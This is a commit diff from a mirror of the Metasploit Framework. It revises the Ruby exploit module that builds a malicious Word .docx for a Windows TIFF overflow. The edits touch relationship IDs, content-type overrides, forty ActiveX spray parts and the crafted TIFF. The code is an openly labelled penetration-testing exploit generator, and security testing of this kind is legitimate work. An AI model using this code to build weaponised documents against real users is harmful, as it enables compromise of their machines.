infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

More progress

bug/bundler_fix
sinn3r 2013-11-21 04:27:41 -06:00
parent e13e457d8f
commit ddd5b0abb9
1 changed files with 142 additions and 55 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

197
modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
View File

@ -217,7 +217,7 @@ class Metasploit3 < Msf::Exploit::Remote
'ax:classid' => "{1EFB6596-857C-11D1-B16A-00C0F0283628}",
'ax:license' => "9368265E-85FE-11d1-8BE3-0000F8754DA1",
'ax:persistence' => "persistStorage",
'r:id' => rid,
'r:id' => "rId#{rid.to_s}",
'xmlns:ax' => "http://schemas.microsoft.com/office/2006/activeX",
'xmlns:r' => @schema
}
@ -242,7 +242,7 @@ class Metasploit3 < Msf::Exploit::Remote
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types") do
xml.Relationship({:Id=>rid, :Type=>acx_type, :Target=>target_bin})
xml.Relationship({:Id=>"rId#{rid.to_s}", :Type=>acx_type, :Target=>target_bin})
end
end
@ -260,7 +260,7 @@ class Metasploit3 < Msf::Exploit::Remote
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types") do
relationships.each do |r|
xml.Relationship({:Id=>r[:id], :Type=>r[:type], :Target=>r[:target]})
xml.Relationship({:Id=>"rId#{r[:id].to_s}", :Type=>r[:type], :Target=>r[:target]})
end
end
end
@ -276,11 +276,20 @@ class Metasploit3 < Msf::Exploit::Remote
rels = []
rels << doc_xml
rels << doc_props
rels = rels.flatten
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types") do
rels.each do |r|
xml.Relationship({:Id=>"rId#{r[:id].to_s}", :Type=>r[:type], :Target=>r[:fname].gsub(/^\//, '')})
end
end
end
{
:fname => "_rels/.rels",
# The .rels generates the same format like make_doc_xml_reals, we'll just use that
:data => make_doc_xml_reals(rels.flatten)
:data => builder.to_xml
}
end
@ -295,14 +304,14 @@ class Metasploit3 < Msf::Exploit::Remote
def init_doc_xml(last_rid, pre_defs, activex, tiff_file)
# Get all the required pre-defs
chart_rids = []
pre_defs.select { |e| chart_rids << e[:rid] }
pre_defs.select { |e| chart_rids << e[:id] }
# Get all the ActiveX RIDs
ax_rids = []
activex.select { |e| ax_rids << e[:rid] }
activex.select { |e| ax_rids << e[:id] }
# Get the TIFF RID
tiff_rid = tiff_file[:rid]
tiff_rid = tiff_file[:id]
# Documentation on how this is crafted:
@ -340,7 +349,7 @@ class Metasploit3 < Msf::Exploit::Remote
xml.rPr do
xml.lang({'w:val' => "en-US"})
end
# The "spray" is contained in these "run" elements
xml.r do
end
@ -359,7 +368,7 @@ class Metasploit3 < Msf::Exploit::Remote
xml.inline({'distT'=>"0", 'distB'=>"0", 'distL'=>"0", 'distR'=>"0"}) do
#xml.extend({'cx'=>'1', 'cy'=>'1'})
xml.effectExtend({'l'=>"1", 't'=>"0", 'r'=>"1", 'b'=>"0"})
xml.docPr({'id'=>'1', 'name' => "drawing 1"})
xml.docPr({'id'=>'rId1', 'name' => "drawing 1"})
xml.cNvGraphicFramePr
xml['a'].graphic({'xmlns'=>"http://schemas.openxmlformats.org/drawingml/2006/main"}) do
xml['a'].graphicData({'uri'=>"http://schemas.openxmlformats.org/drawingml/2006/chart"}) do
@ -373,16 +382,17 @@ class Metasploit3 < Msf::Exploit::Remote
end
# Paragraph (TIFF)
end
end
end
{
:rid => "rId#{last_rid.to_s}",
:type => "#{@schema}/officeDocument",
:fname => "word/document.xml",
:xml => builder.to_xml
:id => (last_rid + 1).to_s,
:type => "#{@schema}/officeDocument",
:fname => "/word/document.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml",
:xml => builder.to_xml
}
end
@ -418,15 +428,15 @@ class Metasploit3 < Msf::Exploit::Remote
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.root({'xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types"}) do
xml.Types({'xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types"}) do
# Default extensions
contenttypes.each do |contenttype|
xml.Override(contenttype)
xml.Default(contenttype)
end
# Additional overrides
overrides.each do |override|
xml.Override({:PartName => override[:PartName], :ContentType => override[:ContentType]})
xml.Override({:PartName => override[:PartName] || override[:fname], :ContentType => override[:ContentType]})
end
end
end
@ -440,9 +450,19 @@ class Metasploit3 < Msf::Exploit::Remote
#
def init_doc_props(last_rid)
items = []
items << {:rid => (last_rid += 1), :type => "#{@schema}/extended-properties", :fname => "docProps/app.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/core-properties", :fname => "docProps/core.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/officeDocument", :fname => "word/document.xml"}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/extended-properties",
:fname => "/docProps/app.xml",
:content_type => "application/vnd.openxmlformats-officedocument.extended-properties+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/core-properties",
:fname => "/docProps/core.xml",
:content_type => "application/vnd.openxmlformats-package.core-properties+xml"
}
return last_rid, items
end
@ -453,16 +473,82 @@ class Metasploit3 < Msf::Exploit::Remote
#
def init_doc_xml_rels_items(last_rid)
items = []
items << {:rid => (last_rid += 1), :type => "#{@schema}/styles", :fname => "word/styles.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/settings", :fname => "word/settings.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/webSettings", :fname => "word/webSettings.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/theme", :fname => "word/theme/theme1.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/chart", :fname => "word/charts/chart1.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/chart", :fname => "word/charts/chart2.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/chart", :fname => "word/charts/chart3.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/chart", :fname => "word/charts/chart4.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/chart", :fname => "word/charts/chart5.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/chart", :fname => "word/charts/chart6.xml"}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/styles",
:fname => "/word/styles.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/settings",
:fname => "/word/settings.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/webSettings",
:fname => "/word/webSettings.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/fontTable",
:fname => "/word/fontTable.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/theme",
:fname => "/word/theme/theme1.xml",
:content_type => "application/vnd.openxmlformats-officedocument.theme+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart1.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart2.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart3.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart4.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart5.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart6.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
return last_rid, items
end
@ -475,30 +561,28 @@ class Metasploit3 < Msf::Exploit::Remote
activex = []
40.times do |i|
id = last_rid + i
last_rid = id
rid = "rId#{id.to_s}"
id = (last_rid += 1)
bin = {
:fname => "word/activeX/ActiveX#{id.to_s}.bin",
:fname => "/word/activeX/ActiveX#{id.to_s}.bin",
:bin => make_activex_bin
}
xml = {
:fname => "word/activeX/ActiveX#{id.to_s}.xml",
:xml => make_activex_xml(rid)
:fname => "/word/activeX/activeX#{id.to_s}.xml",
:xml => make_activex_xml(id)
}
rels = {
:fname => "word/activeX/_rels/activeX#{id.to_s}.xml.rels",
:rels => make_activex_xml_reals(rid, "activeX#{id.to_s}.bin")
:fname => "/word/activeX/_rels/activeX#{id.to_s}.xml.rels",
:rels => make_activex_xml_reals(id, "activeX#{id.to_s}.bin")
}
ct = "application/vnd.ms-office.activeX+xml"
type = "#{@schema}/control"
activex << {
:rid => rid,
:id => id,
:bin => bin,
:xml => xml,
:rels => rels,
@ -516,10 +600,12 @@ class Metasploit3 < Msf::Exploit::Remote
# :PartName The path to an ActiveX XML file
# :ContentType The contenttype of the XML file
#
def init_contenttype_xml_file(activex)
def init_contenttype_xml_file(*items)
overrides = []
activex.each do |obj|
overrides << {:PartName => obj[:xml][:fname], :ContentType => obj[:content_type]}
items.each do |item|
item.each do |obj|
overrides << {:PartName => obj[:fname] || obj[:xml][:fname], :ContentType => obj[:content_type]}
end
end
{:fname => "[Content_Types].xml", :data => make_contenttype_xml(overrides)}
@ -530,14 +616,15 @@ class Metasploit3 < Msf::Exploit::Remote
# Creates the tiff file
#
def init_tiff_file(last_rid)
id = last_rid + 1
tiff_data = {
:rid => "rId#{(last_rid += 1).to_s}",
:fname => "word/media/image1.jpeg",
:id => id,
:fname => "/word/media/image1.jpeg",
:data => make_tiff,
:type => "#{@schema}/image"
}
return last_rid, tiff_data
return id, tiff_data
end
#
@ -546,16 +633,16 @@ class Metasploit3 < Msf::Exploit::Remote
def init_doc_xml_reals_file(pre_defs, activex, tiff)
reals = []
pre_defs.each do |obj|
reals << {:id => obj[:rid], :type => obj[:type], :target => obj[:fname].gsub(/^word\//, '')}
reals << {:id => obj[:id], :type => obj[:type], :target => obj[:fname].gsub(/^\/word\//, '')}
end
activex.each do |obj|
reals << {:id => obj[:rid], :type => obj[:type], :target => obj[:xml][:fname].gsub(/^word\//, '')}
reals << {:id => obj[:id], :type => obj[:type], :target => obj[:xml][:fname].gsub(/^\/word\//, '')}
end
reals << {:id => tiff[:rid], :type => tiff[:type], :target => tiff[:fname].gsub(/^word\//, '')}
reals << {:id => tiff[:id], :type => tiff[:type], :target => tiff[:fname].gsub(/^\/word\//, '')}
{:fname => "word/_rels/document.xml.rels", :data => make_doc_xml_reals(reals)}
{:fname => "/word/_rels/document.xml.rels", :data => make_doc_xml_reals(reals)}
end
#
@ -576,14 +663,14 @@ class Metasploit3 < Msf::Exploit::Remote
#
def make_docx(path)
print_status("Initializing files...")
last_rid = 1
last_rid, activex = init_activex_files(last_rid)
last_rid = 0
last_rid, doc_xml_rels_items = init_doc_xml_rels_items(last_rid)
ct_xml_file = init_contenttype_xml_file(activex)
last_rid, tiff_file = init_tiff_file(last_rid)
last_rid, activex = init_activex_files(last_rid)
last_rid, doc_props = init_doc_props(last_rid)
doc_xml_reals_file = init_doc_xml_reals_file(doc_xml_rels_items, activex, tiff_file)
last_rid, tiff_file = init_tiff_file(last_rid)
doc_xml = init_doc_xml(last_rid, doc_xml_rels_items, activex, tiff_file)
ct_xml_file = init_contenttype_xml_file(activex, doc_xml_rels_items, doc_props, [doc_xml])
doc_xml_reals_file = init_doc_xml_reals_file(doc_xml_rels_items, activex, tiff_file)
rels_xml = init_rels(doc_xml, doc_props)
zip = Rex::Zip::Archive.new